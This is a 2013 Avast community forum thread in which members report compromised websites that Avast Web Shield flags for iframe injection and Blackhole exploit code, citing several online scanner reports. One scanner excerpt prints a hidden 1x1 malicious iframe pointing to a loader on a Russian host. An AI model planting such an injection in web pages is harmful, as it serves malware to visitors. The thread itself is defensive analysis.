Avast community forum
Home
Help
Search
Login
Register
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...
« previous
next »
Print
Pages: [
1
]
Go Down
Author
Topic: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan... (Read 2118 times)
0 Members and 1 Guest are viewing this topic.
polonus
Avast Überevangelist
Probably Bot
Posts: 33926
malware fighter
Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...
«
on:
May 16, 2013, 09:26:04 PM »
Folks, we really cannot do without avast! Web Shield for our protection. Checked this...Up(nil): unknown_html ARIN US abuse at softlayer dot com 50.22.194.94 to 50.22.194.94 berkonoutdoors dot com htxp://berkonoutdoors.com/catalog/
So wanted to look this domain up with evuln malware scanner and avast! Web Shield flagged JS:Decode-XA[Trj]
Detected malicious iframe injection ->
http://urlquery.net/report.php?id=2496495
so even getting enough of the malcode in a scan will block access to that scan.
We have a hihj level of protection, my friends, we sure have...
Also detected here:
http://scanurl.net/?u=http%3A%2F%2Fberkonoutdoors.com%2Fcatalog%2Faccount.php&uesb=Check+This+URL#results
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Pondus
Probably Bot
Posts: 37582
Not a avast user
Re: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...
«
Reply #1 on:
May 16, 2013, 10:34:24 PM »
Blackhole exploit
https://www.virustotal.com/nb/file/8d71de0fb803f921a60a74f080e1c44e224d6ea87c6c02bafb724e2be7e61b16/analysis/1368736403/
Logged
polonus
Avast Überevangelist
Probably Bot
Posts: 33926
malware fighter
Re: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...
«
Reply #2 on:
May 16, 2013, 10:48:39 PM »
Hi Pondus,
Well done, my friend, and thanks, you found up the accompanying file analysis, conclusion - we are being protected,
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
polonus
Avast Überevangelist
Probably Bot
Posts: 33926
malware fighter
Re: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...
«
Reply #3 on:
May 17, 2013, 04:51:30 PM »
Another example here:
https://www.virustotal.com/en/url/9eb8238066cc10b7b820161ab9490946756498c1b81a983242bfb4a1f04db015/analysis/1368801212/
Trying to see the evuln dot com scan results resulted in the avast! Webshield alerting HTML:Iframe-AKU[Trj] and blocking the | (gzip) file there....
Potentially suspicious code in: /plugins/system/rokbox/rokbox-mt1.2.js
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method write <code> __tmpvar2040143295 = write; <code/>
File size[byte]: 21665
File type: ASCII
MD5: FF5022D82F8C393211349AE8951ACB8E
Scan duration[sec]: 0.086000
given at Quttera's.....
Site has vulnerable Joomla code: oomla Version 1.5.18 to 1.5.26 for: htxp://thejourneypc.com/language/en-GB/en-GB.ini via plug-in...
Site blacklisted by Google's Safebrowsing
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
polonus
Avast Überevangelist
Probably Bot
Posts: 33926
malware fighter
Re: Web Shield does not flag this redirect to a High Risk Hosting Provider..
«
Reply #4 on:
May 17, 2013, 05:09:22 PM »
Same here:
http://sitecheck.sucuri.net/results/slownik-angielsko-polski.pl/
WP plug-in vulnerabilities....
https://www.virustotal.com/en/url/f9cc0d2d903232134eb5533c2c6b0cfba98c4d3ffbebcb43116774b73b46114a/analysis/1368802643/
we would think but avast does not flag going to site...
index.html
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Detected hidden iframe tag to 'temp.vulkancomplect.ru' a bad webhost with on IP 283 appearance(s) in spam e-mail or spam post urls
Threat dump: [[<iframe src="htxp://temp.vulkancomplect.ru/srqoxie.php" width=1 height=1 style="visibility: hidden">]]
File size[byte]: 1744
File type: ASCII
MD5: 1D3446BD473753C8A1842DDC1F1C189B
Scan duration[sec]: 0.002000
i.m.h.o. should be blocked,
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Print
Pages: [
1
]
Go Up
« previous
next »
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...